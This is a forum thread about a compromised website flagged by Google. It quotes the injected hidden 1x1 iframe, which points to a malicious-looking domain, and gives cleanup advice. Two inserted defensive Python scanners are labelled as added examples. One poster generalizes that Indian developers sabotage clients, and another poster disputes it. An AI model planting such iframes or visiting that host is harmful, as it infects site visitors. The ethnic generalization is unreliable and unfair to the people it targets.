
Lydia

New Member
Hi All,

I was wondering if anyone could offer me some advice on this problem. Early this week we received an email from Google informing us that our web site is infected with malicious software. This has happened before and we made some changes to the source code which seemed to fix the problem. However the problem has arisen once again. I will post the email from Google in this thread. I am no expert on this kind of thing but I can tell anyone willing to help that we have contacted our server and they said the problem is not with them. Also our page was designed in India and the designers are of no help. We have also run a virus scan and nothing has come up. I would appreciate any help you can offer or even if you can point me in the right direction. Below is a copy of the Google email and our web site.

Thanks in advance!
P.S. I had to remove some URLs in order for me to be allowed to post the thread.
Dear site owner or webmaster of data-call. org,

We recently discovered that some of your pages can cause users to be infected with malicious software. We have begun showing a warning page to users who visit these pages by clicking a search result on Google.

Below are some example URLs on your site which can cause users to be infected (space inserted to prevent accidental clicking in case your mail client auto-links URLs):

data-call .org data-call . org/
We strongly encourage you to investigate this immediately to protect your visitors. Although some sites intentionally distribute malicious software, in many cases the webmaster is unaware because:

1) the site was compromised
2) the site doesn't monitor for malicious user-contributed content
3) the site displays content from an ad network that has a malicious advertiser

If your site was compromised, it's important to not only remove the malicious (and usually hidden) content from your pages, but to also identify and fix the vulnerability. We suggest contacting your hosting provider if you are unsure of how to proceed. StopBadware also has a resource page for securing compromised sites:
Once you've secured your site, you can request that the warning be removed by requesting a review. If your site is no longer harmful to users, we will remove the warning.

Sincerely,
Google Search Quality Team


php.allstar

New Member
Hi,

Firefox displays a more detailed report when you try to access your site. (I always use and always recommend firefox for browsing as it actively alerts you before you view a site if it is dangerous.)

I've seen this in the past with Indian web developers. What they do is to embed an iframe in your source code.

In your case the code was:

!!!DO NOT VISIT THE BELOW URL!!!

Code:
<iframe src="http://davajtemnedenegsejchas.com/spl1/?f115c845296f7ba3144dc004201e3f86" width=1 height=1 style="visibility:hidden"></iframe>
This was on line 15 of your source code. I advise that you edit the HTML file in question to remove the iframe. Then I'd change all account passwords (FTP, database, control panel), and I'd then run a virus scan on the box. If it's on Linux I'd also check for rootkits.

Also please ensure that there are no globally writable folders (chmod 0777) if you are on Linux.

If you're on a shared server, it may be the case that every account on the box has been compromised, so you should follow that up with your hosting company.

This basically loads whatever viruses are on the iframe source site into your site, so your visitors' machines get infected.

I worked for a company in UCD in the past and we asked some Indian designers to provide a mockup of a design for our new site, to see if we wanted to go with them or not. Our boss was not happy with the design so he did not go with the Indian designers. I personally liked the design and went back a few days later to the link on which they had provided the mockup HTML, only for Firefox to report the site as containing malicious code!

Word of advice, don't go to India for design or development for starters. There are plenty of people on this forum who might be willing to do some work on your site for you. Yes, Indian companies are cheap and cheerful, and their work can be fantastic at times, but when they get pissed, they will do this kind of thing to harm you!

Can you verify if you gave hosting access details to the Indian company?

Again, that's not saying that this was definitely caused by the Indian company you hired. It could be a script kiddie somewhere, or your box could be compromised.
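The injection php.allstar describes is easy to miss by eye because the frame is 1x1 and styled invisible. The following is an added example, not code from the thread, that scans HTML for iframes sized or styled so the visitor never sees them, reporting the line number and src so the page owner can find and remove them. The sample page and the iframe URL (malicious.example.invalid) are constructed for the demonstration; the injected line sits on line 15, mirroring the post above.

```python
"""Added example (not from the thread): locate hidden <iframe> injections, i.e.
an iframe with a 1x1 size and/or a style that hides it, and report where they are.
The sample HTML and the hostname malicious.example.invalid are constructed."""
from html.parser import HTMLParser


def _is_tiny(value):
    """True for dimensions such as 1, 0, '1px' or '0px' that render nothing visible."""
    v = value.strip().lower().rstrip("px").strip()
    try:
        return int(v) <= 1
    except ValueError:
        return False


class HiddenIframeFinder(HTMLParser):
    """Collects iframes whose size or style keeps them out of the visitor's sight."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "iframe":
            return
        # Attribute values may be unquoted (width=1), HTMLParser handles that.
        a = {k.lower(): (v or "") for k, v in attrs}
        reasons = []
        if _is_tiny(a.get("width", "")) or _is_tiny(a.get("height", "")):
            reasons.append("1x1 or zero-size frame")
        style = a.get("style", "").replace(" ", "").lower()
        for marker in ("visibility:hidden", "display:none"):
            if marker in style:
                reasons.append("style " + marker)
        if reasons:
            self.findings.append({
                "line": self.getpos()[0],   # 1-based line of the tag in the document
                "src": a.get("src", ""),
                "reasons": reasons,
            })


def find_hidden_iframes(html_text):
    """Return a list of findings (line, src, reasons) for the given HTML text."""
    parser = HiddenIframeFinder()
    parser.feed(html_text)
    parser.close()
    return parser.findings


def scan_file(path):
    """Scan one HTML/PHP template file on disk."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return find_hidden_iframes(fh.read())


# Constructed sample: 13 harmless lines, a visible embed on line 14, injection on 15.
SAMPLE_HTML = "\n".join(
    ["<html><head><title>Constructed sample</title></head><body>"]
    + ["<p>Ordinary paragraph %d</p>" % i for i in range(1, 13)]
    + ['<iframe src="https://www.youtube.com/embed/VIDEO_ID" width="560" height="315"></iframe>']
    + ['<iframe src="http://malicious.example.invalid/spl1/?PLACEHOLDER" width=1 height=1 '
       'style="visibility:hidden"></iframe>']
    + ["</body></html>"]
)

if __name__ == "__main__":
    for f in find_hidden_iframes(SAMPLE_HTML):
        print("line %d: hidden iframe -> %s (%s)" % (f["line"], f["src"], ", ".join(f["reasons"])))
```

Run `scan_file()` over every template and PHP file in the document root (not only index pages, since the injection is often appended to shared footers or includes) and treat any hit as a sign the account is compromised, which means the password changes and host follow-up described in the post still apply after the tag is removed.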

cgarvey

New Member
Word of advice, don't go to India for design or development for starters.

Generalise / over-generalise much? Especially based on the one experience you mention?

Apart from that, good advice!

Lydia, 3 possibilities I can think of, off hand.

1) You are using a CMS that is out of date. In which case you need to fix this (rather than just remove the malicious code) to prevent further occurrences.
2) You have a weak / easily-guessed password on your hosting account
3) You have global write permissions set, or your hosting company has inadequate security, so that any user on the server your website is on can inject this malicious code.

So, are you using a CMS? If so, what CMS and what version?

Do you want one of us here to take a look (will require user/password details, and a certain element of trust!)?

.cg
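Both posts above point at world-writable (chmod 0777) directories as a way any user on a shared box can drop code into a site. The following is an added example, not from the thread, that walks a web root and lists every directory or file whose "other" write bit is set. The demo tree it builds under a temporary directory is constructed so the script runs stand-alone; on a real server you would point it at the actual document root (a path like /var/www/html is an assumption here).

```python
"""Added example (not from the thread): report world-writable directories and files
under a web root, the chmod 0777 check recommended in the thread. The demo tree
under a temporary directory is constructed for the demonstration."""
import os
import stat
import tempfile


def find_world_writable(root):
    """Return paths (relative to root) whose 'other' write bit is set.

    Symlinks are skipped because their own mode is meaningless; a world-writable
    directory with the sticky bit set (like /tmp) is still reported, since any
    local user can still create new files inside it."""
    hits = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            full = os.path.join(dirpath, name)
            st = os.lstat(full)
            if stat.S_ISLNK(st.st_mode):
                continue
            if st.st_mode & stat.S_IWOTH:
                hits.append(os.path.relpath(full, root))
    return sorted(hits)


def build_demo_tree():
    """Constructed sample web root: one 0777 directory, one 0666 file, the rest sane."""
    root = tempfile.mkdtemp(prefix="webroot-demo-")
    os.mkdir(os.path.join(root, "uploads"))
    os.chmod(os.path.join(root, "uploads"), 0o777)          # the classic bad chmod
    os.mkdir(os.path.join(root, "cache"))
    os.chmod(os.path.join(root, "cache"), 0o755)
    with open(os.path.join(root, "cache", "tmp.txt"), "w") as fh:
        fh.write("x")
    os.chmod(os.path.join(root, "cache", "tmp.txt"), 0o666)  # world-writable file
    with open(os.path.join(root, "config.php"), "w") as fh:
        fh.write("<?php // constructed placeholder\n")
    os.chmod(os.path.join(root, "config.php"), 0o644)       # fine: owner writes only
    return root


if __name__ == "__main__":
    # Assumed real-world usage: find_world_writable("/var/www/html")
    demo = build_demo_tree()
    for path in find_world_writable(demo):
        print("world-writable:", path)
```

Anything the script lists should be tightened (0755 for directories, 0644 for files, with upload directories owned by the web server user rather than opened to everyone), and a directory that genuinely needs to be writable by the web server should also be configured so it cannot execute scripts.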

php.allstar

New Member
Generalise / over-generalise much? Especially based on the one experience you mention?

Jesus, thanks for making me sound border-line racist there cgarvey!

Look, I've nothing against Indians or any other nationality for that matter. I just get frustrated when people go to these places to look for designers and developers, when there is an abundant supply here in Ireland.

In most cases, it's generally a budget issue. Although I do submit to the fact that it could also be a work quality/portfolio strength issue!

cgarvey

New Member
No racial slant intended (or interpreted in your original post), relax!

There are a number of Indian agencies who deliver high-quality output at a very reasonable price. Your original assertion that they'll turn nasty on you was unfair. Anyway, enough of a side track!

.cg

Lydia

New Member
Hi guys,
Wow, that's what I call service :) Thanks for responding so quickly. Firstly, we did give the developers the passwords and yes we are on Linux. We're deleting the code now and taking the steps outlined by PHP.Allstar.
CGarvey: Thank you for the offer of taking a look. My boss is going to do what he can and if that fails we may take you up on your offer if that suits you? I am not sure what CMS we are using but I will find out. Can you recommend what we should be using?
I’ll update the thread with our results. Thanks again for your help!
Lydia…
P.S. We ran a virus scan on our own computers and not on the web server where the website is hosted.

cgarvey

New Member
I am not sure what CMS we are using but I will find out. Can you recommend what we should be using?

No recommendation, other than not to be thinking about moving CMS unless you have to (you have bigger issues!!)

If I'm online at the time, I'll help if I can.

php.allstar

New Member
Hi, you're welcome.

CGarvey, I was joking. I was just giving a real world example from my personal experiences.

Lydia, running a virus scan on your computer would not be likely to point out your website as being infected.

You would have to run a virus scan on your website. As you are on Linux, I suggest running chkrootkit from the shell.

If you are on a shared account, I would advise you to tell your host exactly what happened; there may be consequences for other accounts on the box if the server is not set up properly by them. Whoever inserted the malicious code could have also dropped a rootkit into a folder on your site, which could lead to the whole box becoming vulnerable/infected.

Lydia

New Member
Thanks PHP,

I'll pass on the advice. I think we may be on a shared account so better safe than sorry I guess.